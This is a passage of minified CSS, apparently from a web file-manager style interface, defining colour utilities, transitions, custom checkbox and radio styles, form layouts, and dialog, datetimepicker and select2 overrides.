0;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default 